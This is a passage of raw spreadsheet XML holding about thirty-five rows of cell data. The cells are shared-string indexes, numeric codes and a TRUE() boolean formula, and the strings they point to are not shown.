      <c r="S1864" t="s">
        <v>1229</v>
      </c>
      <c r="T1864" t="s">
        <v>7</v>
      </c>
      <c r="U1864" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1865" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1865" s="1">
        <v>18233</v>
      </c>
      <c r="B1865" t="s">
        <v>0</v>
      </c>
      <c r="C1865" t="s">
        <v>78</v>
      </c>
      <c r="D1865" t="s">
        <v>2097</v>
      </c>
      <c r="E1865" t="s">
        <v>1227</v>
      </c>
      <c r="F1865">
        <v>29117300</v>
      </c>
      <c r="G1865" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1865" t="s">
        <v>2203</v>
      </c>
      <c r="K1865">
        <v>0</v>
      </c>
      <c r="L1865" t="s">
        <v>98</v>
      </c>
      <c r="R1865" t="s">
        <v>5</v>
      </c>
      <c r="S1865" t="s">
        <v>1229</v>
      </c>
      <c r="T1865" t="s">
        <v>7</v>
      </c>
      <c r="U1865" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1866" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1866" s="1">
        <v>18234</v>
      </c>
      <c r="B1866" t="s">
        <v>0</v>
      </c>
      <c r="C1866" t="s">
        <v>78</v>
      </c>
      <c r="D1866" t="s">
        <v>2097</v>
      </c>
      <c r="E1866" t="s">
        <v>1227</v>
      </c>
      <c r="F1866">
        <v>29117300</v>
      </c>
      <c r="G1866" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1866" t="s">
        <v>2204</v>
      </c>
      <c r="K1866">
        <v>0</v>
      </c>
      <c r="L1866" t="s">
        <v>98</v>
      </c>
      <c r="R1866" t="s">
        <v>5</v>
      </c>
      <c r="S1866" t="s">
        <v>1229</v>
      </c>
      <c r="T1866" t="s">
        <v>7</v>
      </c>
      <c r="U1866" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1867" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1867" s="1">
        <v>18235</v>
      </c>
      <c r="B1867" t="s">
        <v>0</v>
      </c>
      <c r="C1867" t="s">
        <v>78</v>
      </c>
      <c r="D1867" t="s">
        <v>2097</v>
      </c>
      <c r="E1867" t="s">
        <v>1227</v>
      </c>
      <c r="F1867">
        <v>29117300</v>
      </c>
      <c r="G1867" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1867" t="s">
        <v>2205</v>
      </c>
      <c r="K1867">
        <v>0</v>
      </c>
      <c r="L1867" t="s">
        <v>98</v>
      </c>
      <c r="R1867" t="s">
        <v>5</v>
      </c>
      <c r="S1867" t="s">
        <v>1229</v>
      </c>
      <c r="T1867" t="s">
        <v>7</v>
      </c>
      <c r="U1867" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1868" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1868" s="1">
        <v>18236</v>
      </c>
      <c r="B1868" t="s">
        <v>0</v>
      </c>
      <c r="C1868" t="s">
        <v>78</v>
      </c>
      <c r="D1868" t="s">
        <v>2097</v>
      </c>
      <c r="E1868" t="s">
        <v>1227</v>
      </c>
      <c r="F1868">
        <v>29117300</v>
      </c>
      <c r="G1868" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1868" t="s">
        <v>2206</v>
      </c>
      <c r="K1868">
        <v>0</v>
      </c>
      <c r="L1868" t="s">
        <v>98</v>
      </c>
      <c r="R1868" t="s">
        <v>5</v>
      </c>
      <c r="S1868" t="s">
        <v>1229</v>
      </c>
      <c r="T1868" t="s">
        <v>7</v>
      </c>
      <c r="U1868" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1869" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1869" s="1">
        <v>18237</v>
      </c>
      <c r="B1869" t="s">
        <v>0</v>
      </c>
      <c r="C1869" t="s">
        <v>78</v>
      </c>
      <c r="D1869" t="s">
        <v>2097</v>
      </c>
      <c r="E1869" t="s">
        <v>1227</v>
      </c>
      <c r="F1869">
        <v>29117300</v>
      </c>
      <c r="G1869" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1869" t="s">
        <v>2207</v>
      </c>
      <c r="K1869">
        <v>0</v>
      </c>
      <c r="L1869" t="s">
        <v>98</v>
      </c>
      <c r="R1869" t="s">
        <v>5</v>
      </c>
      <c r="S1869" t="s">
        <v>1229</v>
      </c>
      <c r="T1869" t="s">
        <v>7</v>
      </c>
      <c r="U1869" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1870" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1870" s="1">
        <v>18238</v>
      </c>
      <c r="B1870" t="s">
        <v>0</v>
      </c>
      <c r="C1870" t="s">
        <v>1</v>
      </c>
      <c r="D1870" t="s">
        <v>2097</v>
      </c>
      <c r="E1870" t="s">
        <v>1227</v>
      </c>
      <c r="F1870">
        <v>29117300</v>
      </c>
      <c r="G1870" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1870" t="s">
        <v>2208</v>
      </c>
      <c r="K1870">
        <v>0</v>
      </c>
      <c r="L1870" t="s">
        <v>98</v>
      </c>
      <c r="R1870" t="s">
        <v>5</v>
      </c>
      <c r="S1870" t="s">
        <v>1229</v>
      </c>
      <c r="T1870" t="s">
        <v>7</v>
      </c>
      <c r="U1870" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1871" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1871" s="1">
        <v>18239</v>
      </c>
      <c r="B1871" t="s">
        <v>0</v>
      </c>
      <c r="C1871" t="s">
        <v>78</v>
      </c>
      <c r="D1871" t="s">
        <v>2097</v>
      </c>
      <c r="E1871" t="s">
        <v>1227</v>
      </c>
      <c r="F1871">
        <v>29117300</v>
      </c>
      <c r="G1871" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1871" t="s">
        <v>2209</v>
      </c>
      <c r="K1871">
        <v>0</v>
      </c>
      <c r="L1871" t="s">
        <v>98</v>
      </c>
      <c r="R1871" t="s">
        <v>5</v>
      </c>
      <c r="S1871" t="s">
        <v>1229</v>
      </c>
      <c r="T1871" t="s">
        <v>7</v>
      </c>
      <c r="U1871" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1872" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1872" s="1">
        <v>18240</v>
      </c>
      <c r="B1872" t="s">
        <v>0</v>
      </c>
      <c r="C1872" t="s">
        <v>78</v>
      </c>
      <c r="D1872" t="s">
        <v>2097</v>
      </c>
      <c r="E1872" t="s">
        <v>1227</v>
      </c>
      <c r="F1872">
        <v>29117300</v>
      </c>
      <c r="G1872" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1872" t="s">
        <v>2210</v>
      </c>
      <c r="K1872">
        <v>0</v>
      </c>
      <c r="L1872" t="s">
        <v>98</v>
      </c>
      <c r="R1872" t="s">
        <v>5</v>
      </c>
      <c r="S1872" t="s">
        <v>1229</v>
      </c>
      <c r="T1872" t="s">
        <v>7</v>
      </c>
      <c r="U1872" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1873" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1873" s="1">
        <v>18241</v>
      </c>
      <c r="B1873" t="s">
        <v>0</v>
      </c>
      <c r="C1873" t="s">
        <v>78</v>
      </c>
      <c r="D1873" t="s">
        <v>2097</v>
      </c>
      <c r="E1873" t="s">
        <v>1227</v>
      </c>
      <c r="F1873">
        <v>29117300</v>
      </c>
      <c r="G1873" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1873" t="s">
        <v>2211</v>
      </c>
      <c r="K1873">
        <v>0</v>
      </c>
      <c r="L1873" t="s">
        <v>98</v>
      </c>
      <c r="R1873" t="s">
        <v>5</v>
      </c>
      <c r="S1873" t="s">
        <v>1229</v>
      </c>
      <c r="T1873" t="s">
        <v>7</v>
      </c>
      <c r="U1873" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1874" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1874" s="1">
        <v>18242</v>
      </c>
      <c r="B1874" t="s">
        <v>0</v>
      </c>
      <c r="C1874" t="s">
        <v>78</v>
      </c>
      <c r="D1874" t="s">
        <v>2097</v>
      </c>
      <c r="E1874" t="s">
        <v>1227</v>
      </c>
      <c r="F1874">
        <v>29117300</v>
      </c>
      <c r="G1874" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1874" t="s">
        <v>2212</v>
      </c>
      <c r="K1874">
        <v>0</v>
      </c>
      <c r="L1874" t="s">
        <v>98</v>
      </c>
      <c r="R1874" t="s">
        <v>5</v>
      </c>
      <c r="S1874" t="s">
        <v>1229</v>
      </c>
      <c r="T1874" t="s">
        <v>7</v>
      </c>
      <c r="U1874" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1875" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1875" s="1">
        <v>18243</v>
      </c>
      <c r="B1875" t="s">
        <v>0</v>
      </c>
      <c r="C1875" t="s">
        <v>78</v>
      </c>
      <c r="D1875" t="s">
        <v>2097</v>
      </c>
      <c r="E1875" t="s">
        <v>1227</v>
      </c>
      <c r="F1875">
        <v>29117300</v>
      </c>
      <c r="G1875" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1875" t="s">
        <v>2213</v>
      </c>
      <c r="K1875">
        <v>0</v>
      </c>
      <c r="L1875" t="s">
        <v>98</v>
      </c>
      <c r="R1875" t="s">
        <v>5</v>
      </c>
      <c r="S1875" t="s">
        <v>1229</v>
      </c>
      <c r="T1875" t="s">
        <v>7</v>
      </c>
      <c r="U1875" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1876" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1876" s="1">
        <v>18244</v>
      </c>
      <c r="B1876" t="s">
        <v>0</v>
      </c>
      <c r="C1876" t="s">
        <v>1</v>
      </c>
      <c r="D1876" t="s">
        <v>2097</v>
      </c>
      <c r="E1876" t="s">
        <v>1227</v>
      </c>
      <c r="F1876">
        <v>29117300</v>
      </c>
      <c r="G1876" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1876" t="s">
        <v>2214</v>
      </c>
      <c r="K1876">
        <v>0</v>
      </c>
      <c r="L1876" t="s">
        <v>98</v>
      </c>
      <c r="R1876" t="s">
        <v>5</v>
      </c>
      <c r="S1876" t="s">
        <v>1229</v>
      </c>
      <c r="T1876" t="s">
        <v>7</v>
      </c>
      <c r="U1876" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1877" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1877" s="1">
        <v>18245</v>
      </c>
      <c r="B1877" t="s">
        <v>0</v>
      </c>
      <c r="C1877" t="s">
        <v>78</v>
      </c>
      <c r="D1877" t="s">
        <v>2097</v>
      </c>
      <c r="E1877" t="s">
        <v>1227</v>
      </c>
      <c r="F1877">
        <v>29117300</v>
      </c>
      <c r="G1877" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1877" t="s">
        <v>2215</v>
      </c>
      <c r="K1877">
        <v>0</v>
      </c>
      <c r="L1877" t="s">
        <v>98</v>
      </c>
      <c r="R1877" t="s">
        <v>5</v>
      </c>
      <c r="S1877" t="s">
        <v>1229</v>
      </c>
      <c r="T1877" t="s">
        <v>7</v>
      </c>
      <c r="U1877" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1878" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1878" s="1">
        <v>18246</v>
      </c>
      <c r="B1878" t="s">
        <v>0</v>
      </c>
      <c r="C1878" t="s">
        <v>78</v>
      </c>
      <c r="D1878" t="s">
        <v>2097</v>
      </c>
      <c r="E1878" t="s">
        <v>1227</v>
      </c>
      <c r="F1878">
        <v>29117300</v>
      </c>
      <c r="G1878" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1878" t="s">
        <v>2216</v>
      </c>
      <c r="K1878">
        <v>0</v>
      </c>
      <c r="L1878" t="s">
        <v>98</v>
      </c>
      <c r="R1878" t="s">
        <v>5</v>
      </c>
      <c r="S1878" t="s">
        <v>1229</v>
      </c>
      <c r="T1878" t="s">
        <v>7</v>
      </c>
      <c r="U1878" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1879" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1879" s="1">
        <v>18247</v>
      </c>
      <c r="B1879" t="s">
        <v>0</v>
      </c>
      <c r="C1879" t="s">
        <v>78</v>
      </c>
      <c r="D1879" t="s">
        <v>2097</v>
      </c>
      <c r="E1879" t="s">
        <v>1227</v>
      </c>
      <c r="F1879">
        <v>29117300</v>
      </c>
      <c r="G1879" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1879" t="s">
        <v>2217</v>
      </c>
      <c r="K1879">
        <v>0</v>
      </c>
      <c r="L1879" t="s">
        <v>98</v>
      </c>
      <c r="R1879" t="s">
        <v>5</v>
      </c>
      <c r="S1879" t="s">
        <v>1229</v>
      </c>
      <c r="T1879" t="s">
        <v>7</v>
      </c>
      <c r="U1879" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1880" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1880" s="1">
        <v>18248</v>
      </c>
      <c r="B1880" t="s">
        <v>0</v>
      </c>
      <c r="C1880" t="s">
        <v>78</v>
      </c>
      <c r="D1880" t="s">
        <v>2097</v>
      </c>
      <c r="E1880" t="s">
        <v>1227</v>
      </c>
      <c r="F1880">
        <v>29117300</v>
      </c>
      <c r="G1880" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1880" t="s">
        <v>2218</v>
      </c>
      <c r="K1880">
        <v>0</v>
      </c>
      <c r="L1880" t="s">
        <v>98</v>
      </c>
      <c r="R1880" t="s">
        <v>5</v>
      </c>
      <c r="S1880" t="s">
        <v>1229</v>
      </c>
      <c r="T1880" t="s">
        <v>7</v>
      </c>
      <c r="U1880" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1881" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1881" s="1">
        <v>18249</v>
      </c>
      <c r="B1881" t="s">
        <v>0</v>
      </c>
      <c r="C1881" t="s">
        <v>78</v>
      </c>
      <c r="D1881" t="s">
        <v>2097</v>
      </c>
      <c r="E1881" t="s">
        <v>1227</v>
      </c>
      <c r="F1881">
        <v>29117300</v>
      </c>
      <c r="G1881" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1881" t="s">
        <v>2219</v>
      </c>
      <c r="K1881">
        <v>0</v>
      </c>
      <c r="L1881" t="s">
        <v>98</v>
      </c>
      <c r="R1881" t="s">
        <v>5</v>
      </c>
      <c r="S1881" t="s">
        <v>1229</v>
      </c>
      <c r="T1881" t="s">
        <v>7</v>
      </c>
      <c r="U1881" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1882" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1882" s="1">
        <v>18250</v>
      </c>
      <c r="B1882" t="s">
        <v>0</v>
      </c>
      <c r="C1882" t="s">
        <v>78</v>
      </c>
      <c r="D1882" t="s">
        <v>2097</v>
      </c>
      <c r="E1882" t="s">
        <v>1227</v>
      </c>
      <c r="F1882">
        <v>29117300</v>
      </c>
      <c r="G1882" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1882" t="s">
        <v>2220</v>
      </c>
      <c r="K1882">
        <v>0</v>
      </c>
      <c r="L1882" t="s">
        <v>98</v>
      </c>
      <c r="R1882" t="s">
        <v>5</v>
      </c>
      <c r="S1882" t="s">
        <v>1229</v>
      </c>
      <c r="T1882" t="s">
        <v>7</v>
      </c>
      <c r="U1882" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1883" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1883" s="1">
        <v>18251</v>
      </c>
      <c r="B1883" t="s">
        <v>0</v>
      </c>
      <c r="C1883" t="s">
        <v>78</v>
      </c>
      <c r="D1883" t="s">
        <v>2097</v>
      </c>
      <c r="E1883" t="s">
        <v>1227</v>
      </c>
      <c r="F1883">
        <v>29117300</v>
      </c>
      <c r="G1883" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1883" t="s">
        <v>2221</v>
      </c>
      <c r="K1883">
        <v>0</v>
      </c>
      <c r="L1883" t="s">
        <v>98</v>
      </c>
      <c r="R1883" t="s">
        <v>5</v>
      </c>
      <c r="S1883" t="s">
        <v>1229</v>
      </c>
      <c r="T1883" t="s">
        <v>7</v>
      </c>
      <c r="U1883" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1884" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1884" s="1">
        <v>18252</v>
      </c>
      <c r="B1884" t="s">
        <v>0</v>
      </c>
      <c r="C1884" t="s">
        <v>78</v>
      </c>
      <c r="D1884" t="s">
        <v>2097</v>
      </c>
      <c r="E1884" t="s">
        <v>1227</v>
      </c>
      <c r="F1884">
        <v>29117300</v>
      </c>
      <c r="G1884" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1884" t="s">
        <v>2222</v>
      </c>
      <c r="K1884">
        <v>0</v>
      </c>
      <c r="L1884" t="s">
        <v>98</v>
      </c>
      <c r="R1884" t="s">
        <v>5</v>
      </c>
      <c r="S1884" t="s">
        <v>1229</v>
      </c>
      <c r="T1884" t="s">
        <v>7</v>
      </c>
      <c r="U1884" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1885" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1885" s="1">
        <v>18253</v>
      </c>
      <c r="B1885" t="s">
        <v>0</v>
      </c>
      <c r="C1885" t="s">
        <v>78</v>
      </c>
      <c r="D1885" t="s">
        <v>2097</v>
      </c>
      <c r="E1885" t="s">
        <v>1227</v>
      </c>
      <c r="F1885">
        <v>29117300</v>
      </c>
      <c r="G1885" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1885" t="s">
        <v>2223</v>
      </c>
      <c r="K1885">
        <v>0</v>
      </c>
      <c r="L1885" t="s">
        <v>98</v>
      </c>
      <c r="R1885" t="s">
        <v>5</v>
      </c>
      <c r="S1885" t="s">
        <v>1229</v>
      </c>
      <c r="T1885" t="s">
        <v>7</v>
      </c>
      <c r="U1885" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1886" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1886" s="1">
        <v>18254</v>
      </c>
      <c r="B1886" t="s">
        <v>0</v>
      </c>
      <c r="C1886" t="s">
        <v>78</v>
      </c>
      <c r="D1886" t="s">
        <v>2097</v>
      </c>
      <c r="E1886" t="s">
        <v>1227</v>
      </c>
      <c r="F1886">
        <v>29117300</v>
      </c>
      <c r="G1886" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1886" t="s">
        <v>2224</v>
      </c>
      <c r="K1886">
        <v>0</v>
      </c>
      <c r="L1886" t="s">
        <v>98</v>
      </c>
      <c r="R1886" t="s">
        <v>5</v>
      </c>
      <c r="S1886" t="s">
        <v>1229</v>
      </c>
      <c r="T1886" t="s">
        <v>7</v>
      </c>
      <c r="U1886" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1887" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1887" s="1">
        <v>18255</v>
      </c>
      <c r="B1887" t="s">
        <v>0</v>
      </c>
      <c r="C1887" t="s">
        <v>78</v>
      </c>
      <c r="D1887" t="s">
        <v>2097</v>
      </c>
      <c r="E1887" t="s">
        <v>1227</v>
      </c>
      <c r="F1887">
        <v>29117300</v>
      </c>
      <c r="G1887" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1887" t="s">
        <v>2225</v>
      </c>
      <c r="K1887">
        <v>0</v>
      </c>
      <c r="L1887" t="s">
        <v>98</v>
      </c>
      <c r="R1887" t="s">
        <v>5</v>
      </c>
      <c r="S1887" t="s">
        <v>1229</v>
      </c>
      <c r="T1887" t="s">
        <v>7</v>
      </c>
      <c r="U1887" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1888" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1888" s="1">
        <v>18256</v>
      </c>
      <c r="B1888" t="s">
        <v>0</v>
      </c>
      <c r="C1888" t="s">
        <v>78</v>
      </c>
      <c r="D1888" t="s">
        <v>2097</v>
      </c>
      <c r="E1888" t="s">
        <v>1227</v>
      </c>
      <c r="F1888">
        <v>29117300</v>
      </c>
      <c r="G1888" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1888" t="s">
        <v>2226</v>
      </c>
      <c r="K1888">
        <v>0</v>
      </c>
      <c r="L1888" t="s">
        <v>98</v>
      </c>
      <c r="R1888" t="s">
        <v>5</v>
      </c>
      <c r="S1888" t="s">
        <v>1229</v>
      </c>
      <c r="T1888" t="s">
        <v>7</v>
      </c>
      <c r="U1888" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1889" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1889" s="1">
        <v>18257</v>
      </c>
      <c r="B1889" t="s">
        <v>0</v>
      </c>
      <c r="C1889" t="s">
        <v>78</v>
      </c>
      <c r="D1889" t="s">
        <v>2097</v>
      </c>
      <c r="E1889" t="s">
        <v>1227</v>
      </c>
      <c r="F1889">
        <v>29117300</v>
      </c>
      <c r="G1889" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1889" t="s">
        <v>2227</v>
      </c>
      <c r="K1889">
        <v>0</v>
      </c>
      <c r="L1889" t="s">
        <v>98</v>
      </c>
      <c r="R1889" t="s">
        <v>5</v>
      </c>
      <c r="S1889" t="s">
        <v>1229</v>
      </c>
      <c r="T1889" t="s">
        <v>7</v>
      </c>
      <c r="U1889" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1890" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1890" s="1">
        <v>18258</v>
      </c>
      <c r="B1890" t="s">
        <v>0</v>
      </c>
      <c r="C1890" t="s">
        <v>78</v>
      </c>
      <c r="D1890" t="s">
        <v>2097</v>
      </c>
      <c r="E1890" t="s">
        <v>1227</v>
      </c>
      <c r="F1890">
        <v>29117300</v>
      </c>
      <c r="G1890" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1890" t="s">
        <v>2228</v>
      </c>
      <c r="K1890">
        <v>0</v>
      </c>
      <c r="L1890" t="s">
        <v>98</v>
      </c>
      <c r="R1890" t="s">
        <v>5</v>
      </c>
      <c r="S1890" t="s">
        <v>1229</v>
      </c>
      <c r="T1890" t="s">
        <v>7</v>
      </c>
      <c r="U1890" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1891" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1891" s="1">
        <v>18259</v>
      </c>
      <c r="B1891" t="s">
        <v>0</v>
      </c>
      <c r="C1891" t="s">
        <v>78</v>
      </c>
      <c r="D1891" t="s">
        <v>2097</v>
      </c>
      <c r="E1891" t="s">
        <v>1227</v>
      </c>
      <c r="F1891">
        <v>29117300</v>
      </c>
      <c r="G1891" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1891" t="s">
        <v>2229</v>
      </c>
      <c r="K1891">
        <v>0</v>
      </c>
      <c r="L1891" t="s">
        <v>98</v>
      </c>
      <c r="R1891" t="s">
        <v>5</v>
      </c>
      <c r="S1891" t="s">
        <v>1229</v>
      </c>
      <c r="T1891" t="s">
        <v>7</v>
      </c>
      <c r="U1891" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1892" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1892" s="1">
        <v>18260</v>
      </c>
      <c r="B1892" t="s">
        <v>0</v>
      </c>
      <c r="C1892" t="s">
        <v>78</v>
      </c>
      <c r="D1892" t="s">
        <v>2097</v>
      </c>
      <c r="E1892" t="s">
        <v>1227</v>
      </c>
      <c r="F1892">
        <v>29117300</v>
      </c>
      <c r="G1892" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1892" t="s">
        <v>2230</v>
      </c>
      <c r="K1892">
        <v>0</v>
      </c>
      <c r="L1892" t="s">
        <v>98</v>
      </c>
      <c r="R1892" t="s">
        <v>5</v>
      </c>
      <c r="S1892" t="s">
        <v>1229</v>
      </c>
      <c r="T1892" t="s">
        <v>7</v>
      </c>
      <c r="U1892" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1893" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1893" s="1">
        <v>18261</v>
      </c>
      <c r="B1893" t="s">
        <v>0</v>
      </c>
      <c r="C1893" t="s">
        <v>78</v>
      </c>
      <c r="D1893" t="s">
        <v>2097</v>
      </c>
      <c r="E1893" t="s">
        <v>1227</v>
      </c>
      <c r="F1893">
        <v>29117300</v>
      </c>
      <c r="G1893" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1893" t="s">
        <v>2231</v>
      </c>
      <c r="K1893">
        <v>0</v>
      </c>
      <c r="L1893" t="s">
        <v>98</v>
      </c>
      <c r="R1893" t="s">
        <v>5</v>
      </c>
      <c r="S1893" t="s">
        <v>1229</v>
      </c>
      <c r="T1893" t="s">
        <v>7</v>
      </c>
      <c r="U1893" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1894" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1894" s="1">
        <v>18262</v>
      </c>
      <c r="B1894" t="s">
        <v>0</v>
      </c>
      <c r="C1894" t="s">
        <v>78</v>
      </c>
      <c r="D1894" t="s">
        <v>2097</v>
      </c>
      <c r="E1894" t="s">
        <v>1227</v>
      </c>
      <c r="F1894">
        <v>29117300</v>
      </c>
      <c r="G1894" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1894" t="s">
        <v>2232</v>
      </c>
      <c r="K1894">
        <v>0</v>
      </c>
      <c r="L1894" t="s">
        <v>98</v>
      </c>
      <c r="R1894" t="s">
        <v>5</v>
      </c>
      <c r="S1894" t="s">
        <v>1229</v>
      </c>
      <c r="T1894" t="s">
        <v>7</v>
      </c>
      <c r="U1894" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1895" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1895" s="1">
        <v>18263</v>
      </c>
      <c r="B1895" t="s">
        <v>0</v>
      </c>
      <c r="C1895" t="s">
        <v>78</v>
      </c>
      <c r="D1895" t="s">
        <v>2097</v>
      </c>
      <c r="E1895" t="s">
        <v>1227</v>
      </c>
      <c r="F1895">
        <v>29117300</v>
      </c>
      <c r="G1895" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1895" t="s">
        <v>2233</v>
      </c>
      <c r="K1895">
        <v>0</v>
      </c>
      <c r="L1895" t="s">
        <v>98</v>
      </c>
      <c r="R1895" t="s">
        <v>5</v>
      </c>
      <c r="S1895" t="s">
        <v>1229</v>
      </c>
      <c r="T1895" t="s">
        <v>7</v>
      </c>
      <c r="U1895" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1896" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1896" s="1">
        <v>18264</v>
      </c>
      <c r="B1896" t="s">
        <v>0</v>
      </c>
      <c r="C1896" t="s">
        <v>78</v>
      </c>
      <c r="D1896" t="s">
        <v>2097</v>
      </c>
      <c r="E1896" t="s">
        <v>1227</v>
      </c>
      <c r="F1896">
        <v>29117300</v>
      </c>
      <c r="G1896" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1896" t="s">
        <v>2234</v>
      </c>
      <c r="K1896">
        <v>0</v>
      </c>
      <c r="L1896" t="s">
        <v>98</v>
      </c>
      <c r="R1896" t="s">
        <v>5</v>
      </c>
      <c r="S1896" t="s">
        <v>1229</v>
      </c>
      <c r="T1896" t="s">
        <v>7</v>
      </c>
      <c r="U1896" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1897" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1897" s="1">
        <v>18265</v>
      </c>
      <c r="B1897" t="s">
        <v>0</v>
      </c>
      <c r="C1897" t="s">
        <v>1</v>
      </c>
      <c r="D1897" t="s">
        <v>2097</v>
      </c>
      <c r="E1897" t="s">
        <v>1227</v>
      </c>
      <c r="F1897">
        <v>29117300</v>
      </c>
      <c r="G1897" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1897" t="s">
        <v>2235</v>
      </c>
      <c r="K1897">
        <v>0</v>
      </c>
      <c r="L1897" t="s">
        <v>98</v>
      </c>
      <c r="R1897" t="s">
        <v>5</v>
      </c>
      <c r="S1897" t="s">
        <v>1229</v>
      </c>
      <c r="T1897" t="s">
        <v>7</v>
      </c>
      <c r="U1897" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1898" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1898" s="1">
        <v>18266</v>
      </c>
      <c r="B1898" t="s">
        <v>0</v>
      </c>
      <c r="C1898" t="s">
        <v>78</v>
      </c>
      <c r="D1898" t="s">
        <v>2097</v>
      </c>
      <c r="E1898" t="s">
        <v>1227</v>
      </c>
      <c r="F1898">
        <v>29117300</v>
      </c>
      <c r="G1898" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1898" t="s">
        <v>2236</v>
      </c>
      <c r="K1898">
        <v>0</v>
      </c>
      <c r="L1898" t="s">
        <v>98</v>
      </c>
      <c r="R1898" t="s">
        <v>5</v>
      </c>
      <c r="S1898" t="s">
        <v>1229</v>
      </c>
